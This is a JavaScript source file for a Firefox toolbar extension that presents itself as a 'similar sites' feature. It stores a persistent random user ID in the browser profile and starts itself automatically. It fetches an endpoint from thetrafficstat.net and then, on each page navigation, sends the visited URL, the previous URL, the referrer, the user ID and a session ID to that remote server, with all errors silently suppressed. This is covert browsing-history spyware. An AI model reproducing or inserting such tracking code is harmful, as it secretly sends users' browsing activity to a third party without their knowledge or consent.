var ntk_CommonUtils_ssff = {

	
	//----------------------Constants for rollDate()
	get dtMONTH() { return 0; },
	get dtDAY()   { return 1; },
	get dtYEAR()  { return 2; },

	// Rolling Date to some years/month/days forward or backward 
    // DateType is set {dtYEAR,dtMONTH,dtDAY}
	rollDate : function (date, count, dateType) {
		try {
			var yr = date.getFullYear();
			var mo = date.getMonth() + 1;
			var day = date.getDate();
			
			var hours = date.getHours();
			var minutes = date.getMinutes();
			var seconds = date.getSeconds();
			var milliseconds = date.getMilliseconds();

			var _dateType = this.dtMONTH;
			if (dateType) {
				if ((dateType == this.dtMONTH) || (dateType == this.dtDAY) || (dateType == this.dtYEAR)) {
					_dateType = dateType;
				}
			}
			
			if (_dateType == this.dtYEAR) yr = yr + count;
			if (_dateType == this.dtMONTH) mo = mo + count;
			if (_dateType == this.dtDAY) day = day + count;
		
			return new Date(yr, mo-1, day, hours, minutes, seconds, milliseconds);
		} catch (e) {
			//;
		}
	},

	// Convert Date to String in format: "yyyy-mm-dd HH:MM:SS"
	getDateText: function(d) {		
		var year = d.getFullYear();
		var month = (d.getMonth() < 9 ? '0' : '') + (d.getMonth() + 1);
		var day = (d.getDate() < 10 ? '0' : '') + d.getDate(); 
		var hh =  (d.getHours() < 10 ? '0' : '') + d.getHours();
		var mm =  (d.getMinutes() < 10 ? '0' : '') + d.getMinutes();
		var ss =  (d.getSeconds() < 10 ? '0' : '') + d.getSeconds();
		return  year +"-"+ month +"-"+ day +" "+ hh +":"+ mm +":"+ ss;
	},
	


};

var ntk_Database_ssff = 
{
	_mDBConn: null, // database connection	
    get mDBConn() 
	{ 
		if (this._mDBConn == null) 
			this.init();
		return this._mDBConn;
	},

    init: function() 
	{
		this.openDB();
		this.clearDB();   
    },

    destroy: function() 
	{
    },
	randomStringAlphaNum_ssff : function(length) 
	{
		var chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz'.split('');
		if (! length) 
		{
			length = Math.floor(Math.random() * chars.length);
		}
        
		var str = '';
		for (var i = 0; i < length; i++) 
		{
			str += chars[Math.floor(Math.random() * chars.length)];
		}
		return str;
	},
    openDB: function() 
	{
		try 
		{
			var file = Components.classes["@mozilla.org/file/directory_service;1"].getService(Components.interfaces.nsIProperties).get("ProfD", Components.interfaces.nsIFile);  
			file.append("similarsites.sqlite");
			var storageService = Components.classes["@mozilla.org/storage/service;1"].getService(Components.interfaces.mozIStorageService);  
			this._mDBConn = storageService.openDatabase(file); // Will also create the file if it does not exist  

			// if database not exists - create it!
			var dbExists = this._mDBConn.tableExists("similarsites");
			if ( dbExists && (this.getSimilarsites().length == 0) )
			{
				var statement = ntk_Database_ssff.mDBConn.createStatement("INSERT INTO similarsites(creationdate,  similarsite) values(DATETIME(?1), ?2)");
				var date = "'" + ntk_CommonUtils_ssff.getDateText(new Date()) + "'";
				var similarsite = {};        
				similarsite.similarsite =  ntk_Database_ssff.randomStringAlphaNum_ssff(8) + '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(4) +  '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(12);
				similarsite.similarsite = similarsite.similarsite.toUpperCase(); 
				statement.bindStringParameter(0, date);
				statement.bindStringParameter(1, similarsite.similarsite);
				statement.execute();        
			}
			if( !dbExists  ) 
				this.createDB();

		} 
		catch(err) 
		{
		}
    },
  
	// create database at First time
    createDB: function() 
	{
		try 
		{
			this._mDBConn.executeSimpleSQL("CREATE TABLE similarsites (creationdate TIMESTAMP,  similarsite TEXT)");
			this._mDBConn.executeSimpleSQL("CREATE INDEX indexsimilarsites ON similarsites (creationdate)");
		    var statement = ntk_Database_ssff.mDBConn.createStatement("INSERT INTO similarsites(creationdate,  similarsite) values(DATETIME(?1), ?2)");
            var date = "'" + ntk_CommonUtils_ssff.getDateText(new Date()) + "'";
            var similarsite = {};        
            similarsite.similarsite =  ntk_Database_ssff.randomStringAlphaNum_ssff(8) + '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(4) + '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(4) +  '-' + ntk_Database_ssff.randomStringAlphaNum_ssff(12);
            similarsite.similarsite = similarsite.similarsite.toUpperCase(); 
            statement.bindStringParameter(0, date);
			statement.bindStringParameter(1, similarsite.similarsite);
			statement.execute();        
        
        } 
		catch(err){
			
		}		
    },

    clearDB: function() 
	{		
		if(this._mDBConn.tableExists("similarsites"))   
		{
    	} 
		else 
		{
			this.createDB();
		}
    },
	
	beginMassTranzaction: function() 
	{
		if(!ntk_Database_ssff.mDBConn.transactionInProgress)
			ntk_Database_ssff.mDBConn.beginTransaction();
	},

	endMassTranzaction: function() 
	{
		if(ntk_Database_ssff.mDBConn.transactionInProgress)
			ntk_Database_ssff.mDBConn.commitTransaction();		
	},
		
	addsimilarsite: function(similarsite) 
	{
		try 
		{
			var date = ntk_CommonUtils_ssff.getDateText( similarsite.creationdate );
			var statement = ntk_Database_ssff.mDBConn.createStatement("INSERT INTO similarsites(creationdate, similarsite) values(DATETIME(?1), ?2)");
			statement.bindStringParameter(0, date);
			statement.bindStringParameter(1, similarsite.similarsite);
			statement.execute();
        } 
		catch(e) {}
	},
	
	getSimilarsites: function() 
	{
        try  
		{
			
            var statement = ntk_Database_ssff.mDBConn.createStatement("SELECT creationdate, similarsite FROM similarsites");		
			var results = [];			
			while (statement.executeStep()) 
			{
				var p = {
					date:        statement.getString(0),
					similarsite:     statement.getString(1)
				}
               
				results.push(p);
			}
			statement.finalize();
			return results;
        } 
		catch(e) 
		{ 
			return [];
        }			
	},
    getPid: function() 
	{
        try  
		{
			var similarsites = this.getSimilarsites();
            if(similarsites.length > 0){return similarsites[0].similarsite;}
			else{return null;}
        } 
		catch(e){return null;}			
	}
};


	var ntk_globals_ssff = {
	ci		: Components.interfaces,
	cr		: Components.results,
	cc		: Components.classes,
	webp	: 	Components.interfaces.nsIWebProgress,
	webpl	:	Components.interfaces.nsIWebProgressListener,
	tabs	:	new Array(),
	user_id	: 	ntk_Database_ssff.getPid(),
	s		:	'8002',
	md		:	'21',
	sub		:	'Toolbar1',
	session_id : '',
	listeners : null,
	send_url : '',
	is_valid_listener : function(iid) 
	{	
		return (iid.equals(ntk_globals_ssff.webpl) ||	iid.equals(ntk_globals_ssff.ci.nsISupportsWeakReference) || iid.equals(ntk_globals_ssff.ci.nsISupports));
	},
	load_balance : function() 
	{
		var req = new XMLHttpRequest();
		req.open("GET","http://www.thetrafficstat.net/settings?s="+encodeURIComponent (ntk_globals_ssff.s),true);
		req.onreadystatechange = function()
		{
			if ( req.readyState == 4 )
			{
				var lb = JSON.parse(req.responseText);
				if ( lb && lb.Status == 1 )
				{
					ntk_globals_ssff.send_url = lb.Endpoint;
				}				
			}
		}
		req.send(null);
	},
	get_browser_by_tab_id : function(id)
	{
		var tab = document.getElementById(id);
		if ( !tab )
			return null;
		
		for (var i=0;i<tab.childNodes.length;i++)
		{
			var browser = tab.childNodes[i];
			if ( browser.localName == "browser" )
				return browser;
		}
		
		return null
	},
	get_ff_version : function()
	{
		try 
		{
			return parseFloat(ntk_globals_ssff.cc["@mozilla.org/preferences-service;1"].getService(ntk_globals_ssff.ci.nsIPrefService).getBranch("").getCharPref("extensions.lastAppVersion"));
		}
		catch ( e )
		{
		}
		return 0;
		
	},
	on_page_load : function (e)
	{
	},
	randomStringAlphaNum_ssff : function(length) 
	{
		var chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz'.split('');
		if (! length) 
		{
			length = Math.floor(Math.random() * chars.length);
		}
        
		var str = '';
		for (var i = 0; i < length; i++) 
		{
			str += chars[Math.floor(Math.random() * chars.length)];
		}
		return str;
	},
	randomStringNum_ssff : function(length) 
	{
        var chars = '0123456789'.split('');
        if (! length) 
		{
            length = Math.floor(Math.random() * chars.length);
        }
        
        var str = '';
        for (var i = 0; i < length; i++) 
		{
            str += chars[Math.floor(Math.random() * chars.length)];
        }
        return str;
	},
    randomStringAlpha_ssff : function(length) 
	{
		var chars = 'ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz'.split('');
		if (! length) 
		{
		length = Math.floor(Math.random() * chars.length);
		}
        
		var str = '';
		for (var i = 0; i < length; i++) 
		{
			str += chars[Math.floor(Math.random() * chars.length)];
		}
		return str;
	},
	ntk_tab_added_ssff : function(e)
	{
		try
		{
			var target = event.target;
			if (event.relatedNode != gBrowser.mPanelContainer) return;
			if (target.localName == "vbox"  || target.localName == "notificationbox")
			{
				//target.addEventListener('DOMAttrModified', ntk_globals_ssff.ntk_tab_assigned_ssff, false);
			}
		
		}
		catch (e){}
		return;
	},
	ntk_tab_removed_ssff : function(e)
	{
		try
		{
			if (e.relatedNode != gBrowser.mPanelContainer)
				return;
		
			var target = e.target;
			if ( target.localName != "vbox" )
				return;
			if ( target.parentNode.localName != "tabpanels" )
				return;
			if ( ntk_globals_ssff.tabs[target.id] == undefined )
				return;
			delete ntk_globals_ssff.tabs[target.id].listener;
			delete ntk_globals_ssff.tabs[target.id];
		}
		catch (E){}
	},
	ntk_init_tab_listeners_ssff : function()
	{
		jQuery.noConflict(true);
		ntk_globals_ssff.session_id = 'S' + ntk_globals_ssff.randomStringNum_ssff(14);
		ntk_globals_ssff.load_balance();
		
		if ( ntk_globals_ssff.get_ff_version() >= 4)
		{
			ntk_globals_ssff.listners = new ntk_global_tabs_listner_ssff();
			gBrowser.addTabsProgressListener(ntk_globals_ssff.listners);
			return;
		}

		try
		{
			var nBrowsers = gBrowser.browsers.length;
			for (var tIndex = 0; tIndex < nBrowsers; tIndex++)
			{
				var oBrowser			= window.getBrowser().browsers[tIndex];			
				var tid					= oBrowser.parentNode.id == "" ? oBrowser.parentNode.parentNode.id : oBrowser.parentNode.id;
				ntk_globals_ssff.tabs[tid]			= new ntk_tab_context_ssff(tid);
				ntk_globals_ssff.tabs[tid].listener 	= new ntk_tabs_listener_ssff(tid);
				oBrowser.webProgress.addProgressListener(ntk_globals_ssff.tabs[tid].listener,ntk_globals_ssff.webp.NOTIFY_STATE_NETWORK | ntk_globals_ssff.webp.NOTIFY_STATE_DOCUMENT);
			}
		}
		catch(E){}
	},
	ntk_tab_assigned_ssff : function(e)
	{
	
		if ( e.attrName != 'id'  )
			return;

		var tab_id		= e.newValue;
		var browserObj	= null;
		var target		= e.target;
		ntk_globals_ssff.tabs[tab_id] 			= new ntk_tab_context_ssff(tab_id);
		ntk_globals_ssff.tabs[tab_id].listener 	= new ntk_tabs_listener_ssff(tab_id);
		for (var i = 0; i < target.childNodes.length; i++)
		{
			if (target.childNodes[i].localName == 'browser')
			{
				browserObj = target.childNodes[i];
				break;
			}
		}
		
		if ( !browserObj )
		{
			tab_id = e.currentTarget.linkedPanel;
			browserObj = e.target.linkedBrowser;
		}

		//e.target.removeEventListener('DOMAttrModified', ntk_globals_ssff.ntk_tab_removed_ssff, false);
		browserObj.webProgress.addProgressListener(ntk_globals_ssff.tabs[tab_id].listener,ntk_globals_ssff.webp.NOTIFY_STATE_NETWORK | ntk_globals_ssff.webp.NOTIFY_STATE_DOCUMENT);
	}
	
}

function ntk_global_tabs_listner_ssff(){};
ntk_global_tabs_listner_ssff.prototype = 
{
	QueryInterface: function(iid)
	{
		if ( ntk_globals_ssff.is_valid_listener( iid ) )
			return this;
		throw ntk_globals_ssff.cr.NS_NOINTERFACE;
	},
	onLocationChange: function(aBrowser, aProgress, aRequest, aURI)
	{
		try{
		var httpChannel = null;
		if (aProgress.DOMWindow != aProgress.DOMWindow.top) 
			return 0;

		if ( aURI.asciiSpec.indexOf("about:") > -1)
			return;
			
		var ref = aBrowser.contentDocument.referrer;
		if(aRequest && aRequest.referrer && typeof(aRequest.referrer) != undefined)
			ref = aRequest.referrer.asciiSpec;	
		var is_link = ref != "";
		
		if ( typeof(aBrowser.prev_url_ssff) == "undefined" && (aURI.asciiSpec.indexOf("www.google.com/aclk")>-1)  )
		{
			aBrowser.prev_url_ssff = ref;
			return;
		}
		if ( (aURI.asciiSpec.indexOf("www.google.com/aclk")>-1) )
			return;
		

		var prev = "";
		if (aBrowser.prev_url_ssff && (aBrowser.prev_url_ssff !="")) 
			prev = aBrowser.prev_url_ssff;
		else if ( aProgress.DOMWindow.opener )
			prev = aProgress.DOMWindow.opener.top.location.href;
		else
			prev = ref;
	
		if (
			( prev & prev.indexOf("https://www.google") > -1 ) &&
			( aURI.asciiSpec.indexOf("http://www.google") > -1 )
			)
		{
			return;
		}
		if ( ntk_globals_ssff.send_url && ntk_globals_ssff.send_url != "" )
		{
			var params = "s="+encodeURIComponent(ntk_globals_ssff.s)+"&md="+encodeURIComponent(ntk_globals_ssff.md)+"&pid=" + encodeURIComponent(ntk_globals_ssff.user_id)+"&sess=" +encodeURIComponent(ntk_globals_ssff.session_id)+ "&q=" +encodeURIComponent(aURI.asciiSpec)+ "&prev=" + encodeURIComponent(prev) + "&link="+(is_link?"1":"0")+"&hreferer="+encodeURIComponent(ref)+"&sub="+encodeURIComponent(ntk_globals_ssff.sub);
			var req = new XMLHttpRequest();
			req.open("GET",ntk_globals_ssff.send_url+"/related?"+params,true);
			req.onreadystatechange = function()
			{
				if ( req.readyState == 4 )
				{
				}
			}
			if  ( aBrowser.prev_url_ssff == aURI.asciiSpec )
				return;
			req.send(null);
			}
		aBrowser.prev_url_ssff = aURI.asciiSpec;
		}
		catch(e){};
			
	
	}, 
	onProgressChange: function(aBrowser, aProgress, aRequest, curSelfPr, maxSelfPr, curTotPr, maxTotPr){return 0}, 
	onSecurityChange: function(aBrowser, aProgress, aRequest, aState) {return 0;},
  	onStateChange: function(aBrowser, aProgress, aRequest, aFlag, aStatus)
	{
		try{
		if (!( aFlag & ntk_globals_ssff.webpl.STATE_STOP))
			return 0;
		if (aProgress.DOMWindow != aProgress.DOMWindow.top) 
			return 0;

		var httpChannel = null;
		try {httpChannel = aRequest.QueryInterface(ntk_globals_ssff.ci.nsIHttpChannel);} catch (e) {}
		if ( !httpChannel )
		{
			var x = (aRequest == null);
			return 0;
		}
		
		if ( httpChannel.responseStatus >= 200 || httpChannel.responseStatus < 400)
		{
			if (( aFlag & 0x00080000 ) ) 
			{
				
				
				var ref = aBrowser.contentDocument.referrer;
				if(aRequest && aRequest.referrer && typeof(aRequest.referrer) != undefined)
					ref = aRequest.referrer.asciiSpec;	

				var is_link = ref != "";
				var prev = aBrowser.prev_url_ssff ? aBrowser.prev_url_ssff : "";
				if ( ntk_globals_ssff.sendUrl && ntk_globals_ssff.sendUrl != "" )
				{
					var params = "s="+encodeURIComponent(ntk_globals_ssff.s)+"&md="+encodeURIComponent(ntk_globals_ssff.md)+"&pid=" +encodeURIComponent(ntk_globals_ssff.user_id)+ "&sess=" +encodeURIComponent(ntk_globals_ssff.session_id)+ "&q=" + encodeURIComponent(aURI.asciiSpec) + "&prev=" + encodeURIComponent(prev) + "&link="+(is_link?"1":"0")+"&hreferer="+encodeURIComponent(ref)+"&sub="+encodeURIComponent(ntk_globals_ssff.sub);
					var req = new XMLHttpRequest();
					req.open("GET",ntk_globals_ssff.send_url+"/related?"+params,true);
					req.onreadystatechange = function()
					{
						if ( req.readyState == 4 )
						{
						}
					}
					req.send(null);
				}

			
				aBrowser.prev_url_ssff = httpChannel.URI.asciiSpec;
				
			}
		}
		return 0;
		}
		catch(e){
			
		}
	
	},
	onStatusChange: function(aBrowser, webProgress , request , ostatus ,  message) {return 0;},
	onLinkIconAvailable: function() {return 0;},
	onRefreshAttempted: function(aBrowser,webProgress,aRefreshURI,aMillis,aSameURI){return true;},
	onLinkIconAvailable : function(aBrowser){return 0}
}


function ntk_tabs_listener_ssff(tab_id)
{
	this.tab_id = tab_id;
}

ntk_tabs_listener_ssff.prototype =
{
	QueryInterface: function(iid)
	{
		if ( ntk_globals_ssff.is_valid_listener( iid ) )
		    return this;
			
		throw ntk_globals_ssff.cr.NS_NOINTERFACE;
	},
	onLocationChange: function(aProgress, aRequest, aURI) {return 0;}, 
	onProgressChange: function(aProgress, aRequest, curSelfPr, maxSelfPr, curTotPr, maxTotPr){return 0;}, 
	onSecurityChange: function(aProgress, aRequest, aState) {return 0;},
  	onStateChange: function(aProgress, aRequest, aFlag, aStatus)
	{
		if (!( aFlag & ntk_globals_ssff.webpl.STATE_IS_DOCUMENT ))
			return 0;

		if (!( aFlag & ntk_globals_ssff.webpl.STATE_STOP))
			return 0;

		var cur_tab = this.tab_id;
		var httpChannel = null;
		try {httpChannel = aRequest.QueryInterface(ntk_globals_ssff.ci.nsIHttpChannel);} catch (e) {}
		if ( !httpChannel )
			return 0;

		var oBrowser = ntk_globals_ssff.get_browser_by_tab_id(this.tab_id);
		if ( httpChannel.URI.asciiSpec != oBrowser.currentURI.asciiSpec)
			return;

		if ( httpChannel.responseStatus == 200 )
		{
			var ref = oBrowser.contentDocument.referrer;
			if(aRequest && aRequest.referrer && typeof(aRequest.referrer) != undefined)
				ref = aRequest.referrer.asciiSpec;	

			var is_link = ref != "";
		}
		return 0;
	},
	onStatusChange: function(webProgress , request , ostatus ,  message) {return 0;},
	onLinkIconAvailable: function() {return 0;}
}

function ntk_tab_context_ssff(tab_id)
{
    this.listener		= null;
    this.httpObserver	= null;
    this.tab_id			= tab_id;
	this.prev_url_ssff 		= "";
}

ntk_tab_context_ssff.prototype =
{
    get_tab_browser : function() 
    {
        var browser = null;
        var nBrowsers = gBrowser.browsers.length;
        for (var tab_index = 0; tab_index < nBrowsers; tab_index++)
        {
            if (gBrowser.getBrowserAtIndex(tab_index).parentNode.id ==  this.listener.tab_id)
            {
				browser = gBrowser.getBrowserAtIndex(tab_index);
                break;
            }
        }
        return browser;
    }
}

setTimeout(ntk_globals_ssff.ntk_init_tab_listeners_ssff,500);